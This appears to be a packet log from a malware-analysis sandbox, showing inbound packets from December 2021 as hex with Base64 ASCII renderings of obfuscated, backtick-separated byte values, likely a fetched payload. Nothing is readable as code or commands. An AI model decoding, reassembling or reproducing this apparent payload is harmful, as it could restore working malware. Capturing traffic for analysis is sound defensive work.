2021-12-02 17:26:37 UTC	576	IN	Data Raw: 77 4c 47 42 47 51 69 78 67 52 6b 59 73 59 44 64 45 4c 47 41 7a 52 69 78 67 4e 44 55 73 59 44 6c 46 4c 47 42 44 4e 79 78 67 4e 30 59 73 59 45 59 32 4c 47 41 33 52 43 78 67 4d 55 45 73 59 45 56 42 4c 47 42 43 52 69 78 67 52 6a 59 73 59 44 52 47 4c 47 42 47 51 79 78 67 52 6a 55 73 59 45 5a 47 4c 47 41 79 52 43 78 67 4e 45 59 73 59 44 59 77 4c 47 42 47 51 53 78 67 4e 55 49 73 59 44 64 47 4c 47 41 33 4d 53 78 67 52 6a 63 73 59 44 63 33 4c 47 41 79 4d 43 78 67 4d 30 59 73 59 45 59 34 4c 47 41 35 4e 79 78 67 52 6b 4d 73 59 45 5a 43 4c 47 41 34 4e 69 78 67 4d 44 4d 73 59 44 4e 47 4c 47 42 46 52 53 78 67 51 7a 41 73 59 45 5a 47 4c 47 42 47 51 69 78 67 4e 54 6b 73 59 45 51 78 4c 47 41 34 4d 43 78 67 51 54 63 73 59 44 6b 79 4c 47 41 31 52 69 78 67 52 44 4d 73 59 45 Data Ascii: wLGBGQixgRkYsYDdELGAzRixgNDUsYDlFLGBDNyxgN0YsYEY2LGA3RCxgMUEsYEVBLGBCRixgRjYsYDRGLGBGQyxgRjUsYEZGLGAyRCxgNEYsYDYwLGBGQSxgNUIsYDdGLGA3MSxgRjcsYDc3LGAyMCxgM0YsYEY4LGA5NyxgRkMsYEZCLGA4NixgMDMsYDNGLGBFRSxgQzAsYEZGLGBGQixgNTksYEQxLGA4MCxgQTcsYDkyLGA1RixgRDMsYE
2021-12-02 17:26:37 UTC	592	IN	Data Raw: 43 4c 47 42 47 52 43 78 67 4e 45 55 73 59 45 5a 47 4c 47 42 44 4e 79 78 67 52 55 59 73 59 44 6b 7a 4c 47 42 47 52 53 78 67 51 30 51 73 59 45 55 31 4c 47 42 45 52 43 78 67 52 6a 4d 73 59 45 59 30 4c 47 42 44 52 69 78 67 4e 45 59 73 59 45 52 46 4c 47 42 47 52 43 78 67 4e 55 55 73 59 44 4d 30 4c 47 42 45 4e 43 78 67 52 45 59 73 59 45 5a 43 4c 47 42 42 4e 79 78 67 4e 6a 67 73 59 45 49 79 4c 47 41 33 52 53 78 67 51 6b 59 73 59 44 4e 47 4c 47 42 46 4d 43 78 67 4e 55 59 73 59 45 59 35 4c 47 42 42 4f 53 78 67 52 6a 51 73 59 44 41 33 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 4a 47 4c 47 41 30 4e 43 78 67 52 6a 6b 73 59 44 68 43 4c 47 42 43 52 69 78 67 52 54 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4d 6a 55 73 59 44 64 47 4c 47 41 33 52 43 78 67 52 6b 45 73 59 44 Data Ascii: CLGBGRCxgNEUsYEZGLGBDNyxgRUYsYDkzLGBGRSxgQ0QsYEU1LGBERCxgRjMsYEY0LGBDRixgNEYsYERFLGBGRCxgNUUsYDM0LGBENCxgREYsYEZCLGBBNyxgNjgsYEIyLGA3RSxgQkYsYDNGLGBFMCxgNUYsYEY5LGBBOSxgRjQsYDA3LGBGRixgREEsYEJGLGA0NCxgRjksYDhCLGBCRixgRTQsYDZGLGBGRSxgMjUsYDdGLGA3RCxgRkEsYD
2021-12-02 17:26:37 UTC	608	IN	Data Raw: 78 4c 47 41 79 4f 43 78 67 4f 54 55 73 59 45 5a 47 4c 47 42 45 4e 69 78 67 4e 6b 59 73 59 45 4a 46 4c 47 42 47 4d 79 78 67 52 44 63 73 59 45 45 33 4c 47 42 45 52 69 78 67 52 6b 55 73 59 44 45 7a 4c 47 42 43 52 69 78 67 4d 55 51 73 59 44 5a 42 4c 47 42 44 4e 43 78 67 4e 55 59 73 59 45 4a 47 4c 47 41 79 4d 79 78 67 4f 54 55 73 59 44 4e 43 4c 47 42 47 52 69 78 67 51 54 51 73 59 45 4e 47 4c 47 42 42 4d 53 78 67 4d 6b 55 73 59 44 67 79 4c 47 42 47 51 53 78 67 51 6a 55 73 59 44 64 47 4c 47 42 46 52 43 78 67 4f 54 41 73 59 45 4a 42 4c 47 41 33 52 69 78 67 51 55 59 73 59 44 6b 33 4c 47 41 34 4d 79 78 67 52 6b 55 73 59 44 59 33 4c 47 41 77 51 79 78 67 4e 55 59 73 59 45 5a 44 4c 47 42 45 4f 43 78 67 4e 55 59 73 59 44 42 43 4c 47 41 35 52 43 78 67 52 6a 67 73 59 44 Data Ascii: xLGAyOCxgOTUsYEZGLGBENixgNkYsYEJFLGBGMyxgRDcsYEE3LGBERixgRkUsYDEzLGBCRixgMUQsYDZBLGBDNCxgNUYsYEJGLGAyMyxgOTUsYDNCLGBGRixgQTQsYENGLGBBMSxgMkUsYDgyLGBGQSxgQjUsYDdGLGBFRCxgOTAsYEJBLGA3RixgQUYsYDk3LGA4MyxgRkUsYDY3LGAwQyxgNUYsYEZDLGBEOCxgNUYsYDBCLGA5RCxgRjgsYD
2021-12-02 17:26:37 UTC	624	IN	Data Raw: 43 4c 47 42 42 4e 43 78 67 4d 30 59 73 59 45 59 35 4c 47 42 46 51 69 78 67 52 44 59 73 59 45 4a 47 4c 47 42 45 51 69 78 67 52 6a 6b 73 59 44 52 47 4c 47 41 32 52 43 78 67 51 7a 67 73 59 45 45 79 4c 47 41 78 51 69 78 67 4e 45 45 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 4e 44 49 73 59 45 55 35 4c 47 41 33 52 69 78 67 52 6b 59 73 59 45 49 7a 4c 47 41 7a 52 69 78 67 52 55 51 73 59 45 4e 47 4c 47 41 30 51 69 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 34 51 69 78 67 4e 55 59 73 59 44 67 32 4c 47 41 32 51 69 78 67 4d 44 45 73 59 45 4a 47 4c 47 41 30 51 69 78 67 4e 44 63 73 59 44 45 30 4c 47 42 47 52 53 78 67 51 54 59 73 59 44 4a 47 4c 47 41 30 4d 79 78 67 4e 7a 63 73 59 44 4e 46 4c 47 41 31 4e 79 78 67 4e 54 51 73 59 45 5a 47 4c 47 42 46 4e 43 78 67 4d 45 55 73 59 45 Data Ascii: CLGBBNCxgM0YsYEY5LGBFQixgRDYsYEJGLGBEQixgRjksYDRGLGA2RCxgQzgsYEEyLGAxQixgNEEsYEZGLGA4MyxgNDIsYEU5LGA3RixgRkYsYEIzLGAzRixgRUQsYENGLGA0QixgMUYsYEZELGA4QixgNUYsYDg2LGA2QixgMDEsYEJGLGA0QixgNDcsYDE0LGBGRSxgQTYsYDJGLGA0MyxgNzcsYDNFLGA1NyxgNTQsYEZGLGBFNCxgMEUsYE
2021-12-02 17:26:37 UTC	640	IN	Data Raw: 34 4c 47 42 46 4e 43 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 42 4e 79 78 67 4e 30 59 73 59 45 4a 47 4c 47 41 33 52 69 78 67 52 6a 49 73 59 44 42 43 4c 47 42 46 4f 53 78 67 52 45 59 73 59 45 59 32 4c 47 42 45 4e 79 78 67 4e 7a 67 73 59 44 52 44 4c 47 42 47 52 69 78 67 52 6b 55 73 59 45 4e 45 4c 47 42 42 4e 79 78 67 51 30 59 73 59 45 55 35 4c 47 42 45 52 69 78 67 51 6b 59 73 59 45 5a 43 4c 47 42 46 4f 53 78 67 52 55 59 73 59 44 52 43 4c 47 42 47 52 69 78 67 52 6b 55 73 59 45 4e 44 4c 47 42 45 4d 79 78 67 4f 54 49 73 59 45 5a 46 4c 47 41 33 52 43 78 67 4e 30 55 73 59 45 5a 42 4c 47 41 77 4e 79 78 67 52 44 4d 73 59 45 4a 47 4c 47 42 47 52 69 78 67 51 30 51 73 59 45 5a 45 4c 47 41 7a 52 69 78 67 4f 54 6b 73 59 45 5a 46 4c 47 42 47 52 43 78 67 4d 6b 59 73 59 44 Data Ascii: 4LGBFNCxgRjQsYDM3LGBBNyxgN0YsYEJGLGA3RixgRjIsYDBCLGBFOSxgREYsYEY2LGBENyxgNzgsYDRDLGBGRixgRkUsYENELGBBNyxgQ0YsYEU5LGBERixgQkYsYEZCLGBFOSxgRUYsYDRCLGBGRixgRkUsYENDLGBEMyxgOTIsYEZFLGA3RCxgN0UsYEZBLGAwNyxgRDMsYEJGLGBGRixgQ0QsYEZELGAzRixgOTksYEZFLGBGRCxgMkYsYD
2021-12-02 17:26:37 UTC	656	IN	Data Raw: 44 4c 47 42 47 4f 43 78 67 4e 6b 49 73 59 44 4e 44 4c 47 41 33 51 69 78 67 52 6a 41 73 59 45 4e 47 4c 47 42 47 4d 79 78 67 4d 6a 63 73 59 45 5a 47 4c 47 41 79 51 53 78 67 51 6b 51 73 59 45 5a 43 4c 47 42 46 4e 79 78 67 4d 30 51 73 59 45 59 34 4c 47 41 33 4e 79 78 67 4d 30 55 73 59 45 5a 42 4c 47 41 34 52 69 78 67 4e 30 59 73 59 45 4e 45 4c 47 41 33 52 69 78 67 4f 55 4d 73 59 44 4e 47 4c 47 42 47 52 69 78 67 4d 55 51 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4f 54 63 73 59 44 64 46 4c 47 42 47 4d 79 78 67 4e 30 59 73 59 45 5a 43 4c 47 42 45 4e 79 78 67 52 6b 4d 73 59 45 56 47 4c 47 41 77 52 69 78 67 52 6b 55 73 59 45 51 7a 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 45 4d 33 4c 47 41 33 52 53 78 67 4f 45 51 73 59 44 64 47 4c 47 42 46 4e 53 78 67 4d 54 45 73 59 44 Data Ascii: DLGBGOCxgNkIsYDNDLGA3QixgRjAsYENGLGBGMyxgMjcsYEZGLGAyQSxgQkQsYEZCLGBFNyxgM0QsYEY4LGA3NyxgM0UsYEZBLGA4RixgN0YsYENELGA3RixgOUMsYDNGLGBGRixgMUQsYDNGLGBGRCxgOTcsYDdFLGBGMyxgN0YsYEZCLGBENyxgRkMsYEVGLGAwRixgRkUsYEQzLGBERixgRkMsYEM3LGA3RSxgOEQsYDdGLGBFNSxgMTEsYD
2021-12-02 17:26:37 UTC	672	IN	Data Raw: 46 4c 47 41 77 52 53 78 67 52 6a 51 73 59 45 59 35 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 44 6b 33 4c 47 42 47 51 79 78 67 51 54 4d 73 59 44 64 47 4c 47 42 46 52 69 78 67 4d 30 59 73 59 44 52 42 4c 47 41 31 4d 79 78 67 52 6a 67 73 59 45 59 32 4c 47 41 78 52 69 78 67 52 6b 51 73 59 45 51 7a 4c 47 41 33 52 69 78 67 51 6a 4d 73 59 45 52 47 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 44 4d 31 4c 47 41 33 52 53 78 67 52 6b 4d 73 59 45 5a 44 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 4e 45 4c 47 41 77 4f 43 78 67 51 7a 4d 73 59 44 4e 47 4c 47 42 46 4e 53 78 67 4e 30 45 73 59 45 5a 43 4c 47 41 78 52 69 78 67 52 6a 6b 73 59 44 56 43 4c 47 42 46 4f 43 78 67 52 54 63 73 59 45 52 47 4c 47 42 47 4f 43 78 67 4f 45 59 73 59 45 5a 46 4c 47 42 43 4d 53 78 67 52 44 4d 73 59 44 Data Ascii: FLGAwRSxgRjQsYEY5LGAzRixgRkEsYDk3LGBGQyxgQTMsYDdGLGBFRixgM0YsYDRBLGA1MyxgRjgsYEY2LGAxRixgRkQsYEQzLGA3RixgQjMsYERGLGAzMCxgRkQsYDM1LGA3RSxgRkMsYEZDLGAzNyxgRkUsYDNELGAwOCxgQzMsYDNGLGBFNSxgN0EsYEZCLGAxRixgRjksYDVCLGBFOCxgRTcsYERGLGBGOCxgOEYsYEZFLGBCMSxgRDMsYD
2021-12-02 17:26:37 UTC	688	IN	Data Raw: 79 4c 47 42 42 4f 43 78 67 4e 30 4d 73 59 44 51 79 4c 47 41 77 4f 53 78 67 51 7a 63 73 59 45 5a 45 4c 47 41 7a 52 43 78 67 4e 44 41 73 59 44 4d 35 4c 47 42 45 4f 43 78 67 4e 7a 6b 73 59 44 64 42 4c 47 41 33 51 53 78 67 4f 45 59 73 59 44 51 7a 4c 47 41 34 51 69 78 67 52 6b 51 73 59 44 67 33 4c 47 42 47 4e 79 78 67 52 55 55 73 59 44 4e 45 4c 47 42 43 52 43 78 67 51 30 51 73 59 44 46 44 4c 47 41 78 52 43 78 67 4d 55 59 73 59 44 4e 44 4c 47 41 79 4d 79 78 67 51 55 51 73 59 45 4a 42 4c 47 41 77 51 69 78 67 4d 6b 49 73 59 45 5a 46 4c 47 41 32 51 79 78 67 4f 54 63 73 59 45 4d 79 4c 47 41 31 51 79 78 67 4e 44 41 73 59 44 63 35 4c 47 42 47 4f 43 78 67 52 54 51 73 59 45 51 35 4c 47 41 77 4d 53 78 67 51 7a 55 73 59 44 6b 78 4c 47 42 44 4e 43 78 67 52 44 63 73 59 44 Data Ascii: yLGBBOCxgN0MsYDQyLGAwOSxgQzcsYEZELGAzRCxgNDAsYDM5LGBEOCxgNzksYDdBLGA3QSxgOEYsYDQzLGA4QixgRkQsYDg3LGBGNyxgRUUsYDNELGBCRCxgQ0QsYDFDLGAxRCxgMUYsYDNDLGAyMyxgQUQsYEJBLGAwQixgMkIsYEZFLGA2QyxgOTcsYEMyLGA1QyxgNDAsYDc5LGBGOCxgRTQsYEQ5LGAwMSxgQzUsYDkxLGBDNCxgRDcsYD
2021-12-02 17:26:37 UTC	704	IN	Data Raw: 47 4c 47 42 43 52 69 78 67 52 6a 4d 73 59 44 68 47 4c 47 42 47 51 79 78 67 4f 54 45 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4e 55 59 73 59 45 59 33 4c 47 41 34 52 69 78 67 52 6b 4d 73 59 44 6b 35 4c 47 42 43 52 69 78 67 52 6b 59 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4d 7a 51 73 59 44 5a 43 4c 47 42 43 4d 79 78 67 4e 55 59 73 59 45 55 7a 4c 47 41 77 4e 79 78 67 52 6b 59 73 59 45 4d 34 4c 47 41 78 52 69 78 67 51 6a 51 73 59 45 59 33 4c 47 41 34 52 69 78 67 52 6b 55 73 59 44 41 35 4c 47 42 45 4f 53 78 67 51 55 59 73 59 44 63 78 4c 47 42 47 4e 69 78 67 4f 45 59 73 59 45 5a 44 4c 47 41 31 4f 53 78 67 52 6b 59 73 59 45 4d 34 4c 47 41 31 52 69 78 67 52 6b 4d 73 59 44 68 47 4c 47 42 47 52 53 78 67 52 6a 6b 73 59 45 51 35 4c 47 42 42 52 69 78 67 4e 44 45 73 59 44 Data Ascii: GLGBCRixgRjMsYDhGLGBGQyxgOTEsYEZGLGBFOCxgNUYsYEY3LGA4RixgRkMsYDk5LGBCRixgRkYsYEFGLGBGMSxgMzQsYDZCLGBCMyxgNUYsYEUzLGAwNyxgRkYsYEM4LGAxRixgQjQsYEY3LGA4RixgRkUsYDA5LGBEOSxgQUYsYDcxLGBGNixgOEYsYEZDLGA1OSxgRkYsYEM4LGA1RixgRkMsYDhGLGBGRSxgRjksYEQ5LGBBRixgNDEsYD
2021-12-02 17:26:37 UTC	720	IN	Data Raw: 47 4c 47 42 47 52 43 78 67 52 45 49 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 45 59 73 59 45 59 79 4c 47 41 78 4e 79 78 67 52 6b 4d 73 59 44 49 7a 4c 47 41 33 52 69 78 67 52 45 59 73 59 44 4e 47 4c 47 42 47 51 53 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 79 4d 79 78 67 4e 30 59 73 59 45 5a 43 4c 47 42 42 52 69 78 67 52 6a 45 73 59 44 68 47 4c 47 42 47 52 53 78 67 4d 6a 6b 73 59 44 4a 47 4c 47 42 47 4e 69 78 67 51 7a 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 52 45 59 73 59 45 5a 46 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 45 5a 46 4c 47 42 43 52 69 78 67 51 7a 6b 73 59 44 4e 47 4c 47 42 47 51 53 78 67 4d 54 63 73 59 44 64 44 4c 47 41 30 51 53 78 67 4d 30 59 73 59 45 56 47 4c 47 41 33 52 43 78 67 4f 54 45 73 59 45 5a 45 4c 47 42 42 4d 79 78 67 4e 30 59 73 59 44 Data Ascii: GLGBGRCxgREIsYDdFLGA4RCxgREYsYEYyLGAxNyxgRkMsYDIzLGA3RixgREYsYDNGLGBGQSxgMzcsYEZFLGAyMyxgN0YsYEZCLGBBRixgRjEsYDhGLGBGRSxgMjksYDJGLGBGNixgQzYsYEZGLGBFOCxgREYsYEZFLGA2QixgRkMsYEZFLGBCRixgQzksYDNGLGBGQSxgMTcsYDdDLGA0QSxgM0YsYEVGLGA3RCxgOTEsYEZELGBBMyxgN0YsYD
2021-12-02 17:26:37 UTC	736	IN	Data Raw: 77 4c 47 41 30 4f 43 78 67 4f 54 49 73 59 45 5a 47 4c 47 41 30 4e 43 78 67 4e 55 49 73 59 44 6b 35 4c 47 41 31 4d 79 78 67 4e 6a 4d 73 59 44 59 31 4c 47 41 7a 4d 43 78 67 4e 6a 63 73 59 44 45 79 4c 47 42 43 4d 53 78 67 4e 44 67 73 59 44 63 30 4c 47 41 34 4d 69 78 67 52 6a 63 73 59 44 41 31 4c 47 41 31 4e 79 78 67 4f 54 45 73 59 44 68 44 4c 47 41 77 4e 79 78 67 4d 45 4d 73 59 44 59 31 4c 47 41 34 52 69 78 67 4e 7a 45 73 59 44 4d 7a 4c 47 42 47 4d 69 78 67 4d 6a 6b 73 59 44 63 79 4c 47 41 79 4e 53 78 67 52 45 4d 73 59 44 59 34 4c 47 42 46 51 79 78 67 4f 54 51 73 59 45 4e 44 4c 47 42 42 51 53 78 67 4e 6a 67 73 59 44 4d 31 4c 47 42 43 4d 53 78 67 52 6a 49 73 59 44 51 32 4c 47 41 33 51 69 78 67 4f 44 67 73 59 44 49 32 4c 47 41 78 4e 43 78 67 52 44 6b 73 59 44 Data Ascii: wLGA0OCxgOTIsYEZGLGA0NCxgNUIsYDk5LGA1MyxgNjMsYDY1LGAzMCxgNjcsYDEyLGBCMSxgNDgsYDc0LGA4MixgRjcsYDA1LGA1NyxgOTEsYDhDLGAwNyxgMEMsYDY1LGA4RixgNzEsYDMzLGBGMixgMjksYDcyLGAyNSxgREMsYDY4LGBFQyxgOTQsYENDLGBBQSxgNjgsYDM1LGBCMSxgRjIsYDQ2LGA3QixgODgsYDI2LGAxNCxgRDksYD
2021-12-02 17:26:37 UTC	752	IN	Data Raw: 42 4c 47 41 35 51 79 78 67 4e 44 67 73 59 44 4d 32 4c 47 41 31 51 69 78 67 4e 30 4d 73 59 44 41 30 4c 47 42 47 4d 53 78 67 52 6a 41 73 59 44 49 30 4c 47 42 45 4e 79 78 67 4d 6a 41 73 59 44 6b 78 4c 47 42 43 4d 79 78 67 51 6a 51 73 59 44 45 31 4c 47 41 7a 51 79 78 67 4f 44 55 73 59 44 4a 43 4c 47 41 34 52 43 78 67 4e 6b 59 73 59 44 49 35 4c 47 42 45 51 79 78 67 4d 44 4d 73 59 45 4e 44 4c 47 41 30 4d 53 78 67 4d 45 51 73 59 45 49 78 4c 47 41 78 52 69 78 67 4e 6a 49 73 59 44 56 47 4c 47 41 79 4e 53 78 67 52 55 59 73 59 44 49 34 4c 47 42 46 4d 79 78 67 4f 54 51 73 59 45 46 44 4c 47 41 34 51 79 78 67 52 54 45 73 59 44 49 35 4c 47 42 47 4d 79 78 67 51 54 6b 73 59 44 63 34 4c 47 42 46 4f 43 78 67 4d 6a 59 73 59 45 51 32 4c 47 41 7a 4d 53 78 67 51 6a 45 73 59 44 Data Ascii: BLGA5QyxgNDgsYDM2LGA1QixgN0MsYDA0LGBGMSxgRjAsYDI0LGBENyxgMjAsYDkxLGBCMyxgQjQsYDE1LGAzQyxgODUsYDJCLGA4RCxgNkYsYDI5LGBEQyxgMDMsYENDLGA0MSxgMEQsYEIxLGAxRixgNjIsYDVGLGAyNSxgRUYsYDI4LGBFMyxgOTQsYEFDLGA4QyxgRTEsYDI5LGBGMyxgQTksYDc4LGBFOCxgMjYsYEQ2LGAzMSxgQjEsYD
2021-12-02 17:26:37 UTC	768	IN	Data Raw: 78 4c 47 41 78 4e 53 78 67 4e 44 55 73 59 45 4a 47 4c 47 41 34 4f 53 78 67 52 6a 59 73 59 44 45 77 4c 47 42 44 52 53 78 67 4d 54 59 73 59 44 46 45 4c 47 41 34 4e 69 78 67 52 44 59 73 59 44 4d 79 4c 47 41 78 4e 69 78 67 4f 44 6b 73 59 44 4d 33 4c 47 41 77 4d 43 78 67 4e 44 45 73 59 45 49 34 4c 47 42 45 4e 53 78 67 4e 54 6b 73 59 44 6b 78 4c 47 41 78 52 43 78 67 4f 44 55 73 59 44 4a 46 4c 47 41 31 52 53 78 67 4f 55 59 73 59 44 6b 35 4c 47 41 79 4d 79 78 67 52 54 4d 73 59 44 55 7a 4c 47 41 34 51 69 78 67 4d 30 59 73 59 44 5a 42 4c 47 42 47 51 79 78 67 4e 7a 51 73 59 44 67 35 4c 47 41 35 4f 53 78 67 4e 44 51 73 59 44 42 43 4c 47 41 34 51 53 78 67 4f 55 59 73 59 45 4a 46 4c 47 42 44 52 43 78 67 4e 7a 67 73 59 44 51 35 4c 47 42 43 52 69 78 67 4f 44 41 73 59 45 Data Ascii: xLGAxNSxgNDUsYEJGLGA4OSxgRjYsYDEwLGBDRSxgMTYsYDFELGA4NixgRDYsYDMyLGAxNixgODksYDM3LGAwMCxgNDEsYEI4LGBENSxgNTksYDkxLGAxRCxgODUsYDJFLGA1RSxgOUYsYDk5LGAyMyxgRTMsYDUzLGA4QixgM0YsYDZBLGBGQyxgNzQsYDg5LGA5OSxgNDQsYDBCLGA4QSxgOUYsYEJFLGBDRCxgNzgsYDQ5LGBCRixgODAsYE
2021-12-02 17:26:37 UTC	784	IN	Data Raw: 31 4c 47 41 79 4e 43 78 67 52 55 55 73 59 44 45 32 4c 47 41 7a 52 43 78 67 52 55 49 73 59 44 55 32 4c 47 41 79 4e 79 78 67 51 7a 51 73 59 44 6b 79 4c 47 41 30 4f 53 78 67 4e 54 51 73 59 45 4e 43 4c 47 41 32 51 69 78 67 51 6a 41 73 59 45 4a 47 4c 47 42 43 4e 53 78 67 52 6a 41 73 59 45 46 44 4c 47 42 47 4f 43 78 67 4d 44 63 73 59 44 49 79 4c 47 42 46 4e 79 78 67 4d 6a 49 73 59 45 51 7a 4c 47 42 42 4d 69 78 67 4e 54 55 73 59 44 42 46 4c 47 42 47 4f 43 78 67 4e 30 51 73 59 45 59 78 4c 47 42 47 51 53 78 67 4e 30 55 73 59 44 42 45 4c 47 42 44 52 53 78 67 4d 45 49 73 59 44 67 34 4c 47 41 77 4e 79 78 67 4d 6b 59 73 59 44 5a 43 4c 47 41 31 52 69 78 67 4f 55 59 73 59 44 5a 42 4c 47 41 30 51 69 78 67 52 6a 45 73 59 44 6c 42 4c 47 41 30 51 79 78 67 4d 7a 59 73 59 44 Data Ascii: 1LGAyNCxgRUUsYDE2LGAzRCxgRUIsYDU2LGAyNyxgQzQsYDkyLGA0OSxgNTQsYENCLGA2QixgQjAsYEJGLGBCNSxgRjAsYEFDLGBGOCxgMDcsYDIyLGBFNyxgMjIsYEQzLGBBMixgNTUsYDBFLGBGOCxgN0QsYEYxLGBGQSxgN0UsYDBELGBDRSxgMEIsYDg4LGAwNyxgMkYsYDZCLGA1RixgOUYsYDZBLGA0QixgRjEsYDlBLGA0QyxgMzYsYD
2021-12-02 17:26:37 UTC	800	IN	Data Raw: 79 4c 47 41 33 4f 53 78 67 52 55 49 73 59 44 67 33 4c 47 41 7a 51 79 78 67 4d 30 45 73 59 44 6b 78 4c 47 41 79 51 79 78 67 51 7a 6b 73 59 44 5a 47 4c 47 41 34 4f 43 78 67 4e 55 51 73 59 44 63 7a 4c 47 41 78 4d 53 78 67 51 6a 45 73 59 44 55 35 4c 47 42 44 4e 79 78 67 4f 54 49 73 59 44 4d 34 4c 47 41 34 4f 53 78 67 51 6a 4d 73 59 44 41 34 4c 47 42 44 4e 79 78 67 4d 54 49 73 59 44 4a 43 4c 47 41 30 51 53 78 67 4e 7a 59 73 59 44 46 43 4c 47 41 31 4e 43 78 67 4f 44 51 73 59 44 59 31 4c 47 41 35 4d 79 78 67 52 55 4d 73 59 45 51 35 4c 47 41 7a 4d 53 78 67 52 54 4d 73 59 44 49 77 4c 47 41 35 51 53 78 67 52 55 49 73 59 44 45 35 4c 47 41 33 52 69 78 67 4f 44 4d 73 59 44 64 47 4c 47 41 78 4d 53 78 67 4d 45 49 73 59 44 4e 45 4c 47 42 46 4d 53 78 67 4f 55 55 73 59 44 Data Ascii: yLGA3OSxgRUIsYDg3LGAzQyxgM0EsYDkxLGAyQyxgQzksYDZGLGA4OCxgNUQsYDczLGAxMSxgQjEsYDU5LGBDNyxgOTIsYDM4LGA4OSxgQjMsYDA4LGBDNyxgMTIsYDJCLGA0QSxgNzYsYDFCLGA1NCxgODQsYDY1LGA5MyxgRUMsYEQ5LGAzMSxgRTMsYDIwLGA5QSxgRUIsYDE5LGA3RixgODMsYDdGLGAxMSxgMEIsYDNELGBFMSxgOUUsYD
2021-12-02 17:26:37 UTC	816	IN	Data Raw: 7a 4c 47 42 47 4d 43 78 67 4d 44 41 73 59 45 45 78 4c 47 41 32 4e 53 78 67 4f 45 51 73 59 44 52 47 4c 47 41 79 51 69 78 67 52 44 59 73 59 45 52 47 4c 47 41 31 4f 43 78 67 4d 55 59 73 59 45 51 78 4c 47 41 30 52 43 78 67 4d 6a 49 73 59 44 52 45 4c 47 41 78 4d 69 78 67 4e 30 59 73 59 45 56 46 4c 47 41 79 51 53 78 67 4f 44 55 73 59 44 4d 77 4c 47 42 44 51 53 78 67 4e 6a 63 73 59 44 68 44 4c 47 41 77 4d 79 78 67 51 6a 51 73 59 45 56 46 4c 47 41 31 4d 79 78 67 52 55 55 73 59 44 59 35 4c 47 41 30 4e 79 78 67 52 54 6b 73 59 44 41 77 4c 47 42 42 4f 43 78 67 4e 44 59 73 59 44 46 47 4c 47 41 30 51 53 78 67 51 6a 51 73 59 44 41 30 4c 47 41 34 4f 53 78 67 4e 7a 6b 73 59 45 4d 34 4c 47 41 32 52 69 78 67 4d 6a 41 73 59 44 59 33 4c 47 41 77 52 43 78 67 4e 45 59 73 59 45 Data Ascii: zLGBGMCxgMDAsYEExLGA2NSxgOEQsYDRGLGAyQixgRDYsYERGLGA1OCxgMUYsYEQxLGA0RCxgMjIsYDRELGAxMixgN0YsYEVFLGAyQSxgODUsYDMwLGBDQSxgNjcsYDhDLGAwMyxgQjQsYEVFLGA1MyxgRUUsYDY5LGA0NyxgRTksYDAwLGBBOCxgNDYsYDFGLGA0QSxgQjQsYDA0LGA4OSxgNzksYEM4LGA2RixgMjAsYDY3LGAwRCxgNEYsYE
2021-12-02 17:26:37 UTC	832	IN	Data Raw: 31 4c 47 42 45 52 53 78 67 4d 7a 63 73 59 45 5a 42 4c 47 41 30 52 69 78 67 51 54 49 73 59 44 42 44 4c 47 41 34 51 79 78 67 4e 54 49 73 59 45 45 79 4c 47 41 78 52 53 78 67 4d 6a 4d 73 59 44 5a 47 4c 47 42 44 4d 43 78 67 52 45 4d 73 59 44 63 34 4c 47 42 45 4e 53 78 67 4f 44 49 73 59 45 4a 43 4c 47 41 34 4f 53 78 67 52 55 45 73 59 44 46 46 4c 47 41 7a 4d 69 78 67 4e 44 59 73 59 44 49 32 4c 47 42 43 4d 79 78 67 4e 6a 63 73 59 45 49 30 4c 47 42 47 51 69 78 67 4d 45 55 73 59 45 55 7a 4c 47 41 79 52 43 78 67 51 6b 55 73 59 44 67 31 4c 47 41 33 4f 43 78 67 52 6b 4d 73 59 44 59 79 4c 47 41 34 51 69 78 67 4d 55 59 73 59 45 59 79 4c 47 41 31 52 69 78 67 51 7a 59 73 59 44 46 43 4c 47 41 7a 4d 69 78 67 51 6a 59 73 59 44 52 42 4c 47 42 42 4d 69 78 67 4d 7a 49 73 59 44 Data Ascii: 1LGBERSxgMzcsYEZBLGA0RixgQTIsYDBDLGA4QyxgNTIsYEEyLGAxRSxgMjMsYDZGLGBDMCxgREMsYDc4LGBENSxgODIsYEJCLGA4OSxgRUEsYDFFLGAzMixgNDYsYDI2LGBCMyxgNjcsYEI0LGBGQixgMEUsYEUzLGAyRCxgQkUsYDg1LGA3OCxgRkMsYDYyLGA4QixgMUYsYEYyLGA1RixgQzYsYDFCLGAzMixgQjYsYDRBLGBBMixgMzIsYD
2021-12-02 17:26:37 UTC	848	IN	Data Raw: 46 4c 47 41 35 4d 69 78 67 4e 44 63 73 59 45 51 35 4c 47 42 46 4d 53 78 67 4f 54 45 73 59 44 45 35 4c 47 42 44 51 69 78 67 4e 7a 59 73 59 44 68 47 4c 47 42 45 51 69 78 67 4f 44 6b 73 59 45 45 31 4c 47 41 78 4d 69 78 67 51 6b 51 73 59 45 56 42 4c 47 41 32 51 79 78 67 51 55 59 73 59 45 51 34 4c 47 42 45 4e 79 78 67 4f 44 63 73 59 45 5a 44 4c 47 41 35 52 43 78 67 51 6a 45 73 59 45 45 33 4c 47 41 35 4d 69 78 67 52 45 59 73 59 44 45 78 4c 47 41 33 52 53 78 67 4f 54 63 73 59 45 52 46 4c 47 42 44 52 43 78 67 52 54 63 73 59 44 42 47 4c 47 42 47 4f 53 78 67 4d 6b 51 73 59 44 59 77 4c 47 41 79 4f 53 78 67 4d 30 51 73 59 44 45 35 4c 47 41 77 4f 53 78 67 4d 44 41 73 59 44 4e 46 4c 47 41 7a 4d 69 78 67 4f 55 59 73 59 44 59 79 4c 47 41 34 4d 79 78 67 4d 6a 51 73 59 44 Data Ascii: 